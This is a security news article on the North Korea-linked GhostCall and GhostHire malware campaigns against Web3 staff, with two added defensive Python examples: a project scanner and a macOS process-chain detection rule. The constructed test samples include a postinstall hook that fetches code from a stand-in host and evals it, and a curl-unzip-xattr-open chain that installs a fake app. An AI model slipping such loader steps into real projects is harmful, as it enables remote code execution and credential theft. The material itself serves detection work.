GhostCall and GhostHire Overview
Threat actors linked to North Korea are running two related malware campaigns named GhostCall and GhostHire. These operations mainly target professionals in the Web3 and blockchain sectors. According to recent research, both campaigns are part of a long-running effort called SnatchCrypto. Since at least 2017, this effort has focused on stealing crypto assets and sensitive project data from companies worldwide.
How the Lures Work
GhostCall spreads through social messaging platforms, where attackers approach tech executives and investors and invite them to join fake video calls on phishing websites built to mimic meeting platforms. The call seems real at first, but soon prompts the victim to “update” their software with a malicious script. Once downloaded, the script drops ZIP archives that set off the full infection chain. This trick has been used across different countries and mainly targets macOS users.
GhostHire’s Social Engineering
GhostHire uses a different lure. Attackers pose as recruiters contacting Web3 developers through messaging apps. They share links to fake coding assessments hosted on legitimate-looking repositories. Victims are told to finish the task within 30 minutes, which pressures them into running the code. However, the downloaded project contains hidden malware that installs additional payloads once executed. The malicious code adapts to the victim’s operating system, making detection harder.
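The article's recommended counter to this lure is review before execution. The following is an added example, not code from the article or from the researchers it cites, of what such a pre-run review can automate for an unsolicited "coding assessment": it lists the places where a project executes code on its own (npm lifecycle hooks, a setup.py) and flags any source file that combines OS detection, a network fetch and dynamic execution, the shape described above. The npm hook names are real; the trait regexes, the three-trait rule, the verdict labels and the sample project are this example's assumptions.

```python
"""Pre-run review of a downloaded "coding assessment" project.

Added example, not code from the article or from any vendor's report. It
implements the "strict code review" control from a defender's side: before
anyone runs an unsolicited project, list where code executes automatically
(package-manager hooks) and which files combine OS detection, network access
and dynamic execution, the traits the article attributes to GhostHire's task
repositories. Hook names are real npm lifecycle events; the trait regexes,
the three-trait rule and the sample project are this example's assumptions.
"""
import json
import os
import re
import tempfile

# npm runs these scripts during `npm install`, before any source file is opened.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Each trait alone is common in honest code; the first three together in one
# file is the staged-loader shape that deserves a human read before execution.
TRAITS = {
    "os_branch": re.compile(r"process\.platform|platform\.system\(|sys\.platform|runtime\.GOOS"),
    "network": re.compile(r"\bfetch\(|https?://|urllib|requests\.|net/http|XMLHttpRequest"),
    "dyn_exec": re.compile(r"\beval\(|\bexec\(|new Function\(|child_process|subprocess|os\.system\("),
    "encoded": re.compile(r"base64|atob\(|fromCharCode", re.IGNORECASE),
}
LOADER_SHAPE = {"os_branch", "network", "dyn_exec"}
SOURCE_EXT = {".js", ".ts", ".mjs", ".cjs", ".py", ".go", ".rs", ".sh"}
SKIP_DIRS = {".git", "node_modules", "vendor"}


def scan_package_json(path):
    """Findings for npm lifecycle hooks declared in a package.json."""
    with open(path, encoding="utf-8") as fh:
        scripts = json.load(fh).get("scripts", {})
    return [{"file": path, "kind": "lifecycle_hook", "detail": f"{hook}: {cmd}"}
            for hook, cmd in scripts.items() if hook in NPM_LIFECYCLE_HOOKS]


def scan_source(path):
    """One finding if a source file shows the OS-branch + download + exec shape."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(text))
    if LOADER_SHAPE <= set(hits):
        return {"file": path, "kind": "staged_loader", "detail": ",".join(hits)}
    return None


def scan_assessment_repo(root):
    """Walk the project and return all findings (an empty list means nothing flagged)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == "package.json":
                findings.extend(scan_package_json(path))
            elif name == "setup.py":
                # pip executes setup.py on `pip install .`, so it is an auto-run point too.
                findings.append({"file": path, "kind": "install_script", "detail": "setup.py runs on install"})
            if os.path.splitext(name)[1] in SOURCE_EXT:
                hit = scan_source(path)
                if hit:
                    findings.append(hit)
    return findings


def verdict(findings):
    """BLOCK when a staged loader is present, REVIEW for auto-run hooks only, else OK."""
    kinds = {f["kind"] for f in findings}
    if "staged_loader" in kinds:
        return "BLOCK"
    if kinds & {"lifecycle_hook", "install_script"}:
        return "REVIEW"
    return "OK"


def build_sample_repo():
    """Constructed sample project (not a real GhostHire artifact) for a dry run."""
    root = tempfile.mkdtemp(prefix="assessment-")
    os.makedirs(os.path.join(root, "src"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "trading-bot-task",
                   "scripts": {"test": "jest", "postinstall": "node src/telemetry.js"}}, fh)
    with open(os.path.join(root, "src", "index.js"), "w", encoding="utf-8") as fh:
        fh.write("module.exports = (orders) => orders.filter(o => o.qty > 0);\n")
    with open(os.path.join(root, "src", "telemetry.js"), "w", encoding="utf-8") as fh:
        fh.write("const { execSync } = require('child_process');\n"
                 "const target = process.platform === 'darwin' ? 'mac' : 'other';\n"
                 "fetch('https://example.invalid/' + target).then(r => r.text()).then(eval);\n")
    return root


if __name__ == "__main__":
    repo = build_sample_repo()
    results = scan_assessment_repo(repo)
    for f in results:
        print(f"{f['kind']:15} {os.path.relpath(f['file'], repo)}  {f['detail']}")
    print("verdict:", verdict(results))
```

The point of the three-trait rule is to keep the false-positive rate usable: a test suite that reads `process.platform`, a client that calls `fetch`, or a build script that shells out are all normal on their own, so the scanner only escalates to BLOCK when one file does all three, and reports install hooks separately because those run before anyone reads a line of the project.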
Malware Families and Payloads
Researchers discovered that the infection often begins with a malicious AppleScript called DownTroy. This script installs fake meeting apps that seem genuine but hide multiple malware families. For example, loaders such as CosmicDoor, RooTroy, and RealTimeTroy are used to gather system data, install more malware, and even wipe files. Other payloads are written in Go, Rust, and Nim, allowing cross-platform attacks. Moreover, these components can steal credentials, files, and development secrets from infected machines.
Data Theft and Evolving Strategy
The campaigns steal browser passwords, cloud tokens, and service credentials for platforms such as Git, Docker, and cloud environments, so a single stolen key may expose entire blockchain projects and company systems. The attackers’ approach has evolved rapidly, for instance switching from fake Zoom pages to Teams invitations. Researchers also noted that generative AI tools now help speed up their malware development, so new variants appear faster.
How to Prevent Infection
To stay protected, users should avoid downloading software updates from unverified links or compressed files. Always confirm meeting invites or recruiter profiles through official company channels. In addition, organizations should deploy advanced endpoint monitoring and continuous threat detection tools. For example, managed detection and response systems can quickly identify malicious scripts or fake app installers. Regular phishing awareness training and strict code review policies also reduce risk and help block such advanced threats early.
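As an added example of what "continuous threat detection" can mean for the GhostCall chain described earlier, the following rule (written for this article, not taken from it or from any vendor product) scores a macOS process-execution stream for the fake-update shape: a script interpreter run on a file from a download or temp location whose direct children fetch content, unpack archives, strip the quarantine flag or open an app bundle. The JSON event schema, the field names, the thresholds and the sample events are constructed for this example and do not follow any real EDR format.

```python
"""Process-event detection for the "fake update" infection chain.

Added example, not code from the article or from any vendor's report. The
article says the GhostCall lure gets the victim to run an "update" script that
drops ZIP archives and installs a fake meeting app, with an AppleScript stage
at the front. This rule looks for that shape in a macOS process-execution
stream: a script interpreter run on a file from a download or temp location
whose direct children fetch content, unpack archives, strip quarantine flags or
open an app bundle. The JSON event schema, field names and sample events are
constructed for this example and do not follow any real EDR format.
"""
import json
import os
from collections import defaultdict

INTERPRETERS = {"osascript", "bash", "sh", "zsh", "python3"}
# Child binaries that, two or more together under one script, look like staging.
STAGERS = {"curl", "unzip", "ditto", "tar", "xattr", "open"}
DROP_DIR_MARKERS = ("/Downloads/", "/tmp/", "/var/folders/")

# Constructed sample stream: a messaging-app session, a user terminal, the
# malicious chain, one honest build script, and a junk line to show error handling.
SAMPLE_EVENTS = """
{"ts": "2025-10-30T09:12:01Z", "pid": 501, "ppid": 1, "exe": "/Applications/Telegram.app/Contents/MacOS/Telegram", "args": ["Telegram"]}
{"ts": "2025-10-30T09:14:22Z", "pid": 640, "ppid": 1, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "args": ["Terminal"]}
{"ts": "2025-10-30T09:15:03Z", "pid": 702, "ppid": 640, "exe": "/usr/bin/osascript", "args": ["osascript", "/Users/dev/Downloads/MeetingUpdate.scpt"]}
{"ts": "2025-10-30T09:15:04Z", "pid": 703, "ppid": 702, "exe": "/usr/bin/curl", "args": ["curl", "-fsSL", "https://update.example.invalid/pkg.zip", "-o", "/tmp/pkg.zip"]}
{"ts": "2025-10-30T09:15:06Z", "pid": 704, "ppid": 702, "exe": "/usr/bin/unzip", "args": ["unzip", "-o", "/tmp/pkg.zip", "-d", "/tmp/pkg"]}
{"ts": "2025-10-30T09:15:07Z", "pid": 705, "ppid": 702, "exe": "/usr/bin/xattr", "args": ["xattr", "-dr", "com.apple.quarantine", "/tmp/pkg/Meeting.app"]}
{"ts": "2025-10-30T09:15:08Z", "pid": 706, "ppid": 702, "exe": "/usr/bin/open", "args": ["open", "/tmp/pkg/Meeting.app"]}
{"ts": "2025-10-30T09:20:00Z", "pid": 810, "ppid": 640, "exe": "/bin/bash", "args": ["bash", "/Users/dev/code/build.sh"]}
{"ts": "2025-10-30T09:20:01Z", "pid": 811, "ppid": 810, "exe": "/usr/bin/tar", "args": ["tar", "-czf", "dist.tgz", "build"]}
this line is not JSON and must be skipped
"""


def parse_events(text):
    """One JSON object per line; malformed lines are skipped rather than aborting the scan."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def script_arg(ev):
    """First non-flag argument after argv[0]; for these interpreters that is the script path."""
    return next((a for a in ev.get("args", [])[1:] if not a.startswith("-")), None)


def detect_fake_update_chains(events):
    """Alert when an interpreter runs a script from a drop location and two or more
    distinct stager binaries are its direct children."""
    children = defaultdict(list)
    by_pid = {}
    for ev in events:
        by_pid[ev["pid"]] = ev
        children[ev["ppid"]].append(ev)
    alerts = []
    for ev in events:
        if os.path.basename(ev["exe"]) not in INTERPRETERS:
            continue
        script = script_arg(ev)
        if not script or not any(m in script for m in DROP_DIR_MARKERS):
            continue
        stagers = sorted({os.path.basename(c["exe"]) for c in children[ev["pid"]]
                          if os.path.basename(c["exe"]) in STAGERS})
        if len(stagers) < 2:
            continue
        launcher = os.path.basename(by_pid.get(ev["ppid"], {}).get("exe", "unknown"))
        alerts.append({"pid": ev["pid"], "script": script,
                       "stagers": stagers, "launched_by": launcher})
    return alerts


def run_sample():
    """Run the rule over the constructed sample stream."""
    return detect_fake_update_chains(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALERT pid={a['pid']} {a['launched_by']} -> {a['script']} "
              f"staged via {', '.join(a['stagers'])}")
```

On the sample stream the honest build script is ignored because it lives outside a drop location and spawns only one stager, while the osascript run from Downloads is flagged with all four staging children; in a real deployment the same rule would be fed from the endpoint agent's process-creation telemetry and tuned per fleet, since developer machines legitimately run scripts from Downloads more often than executive laptops do.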
Sleep well, we got you covered.

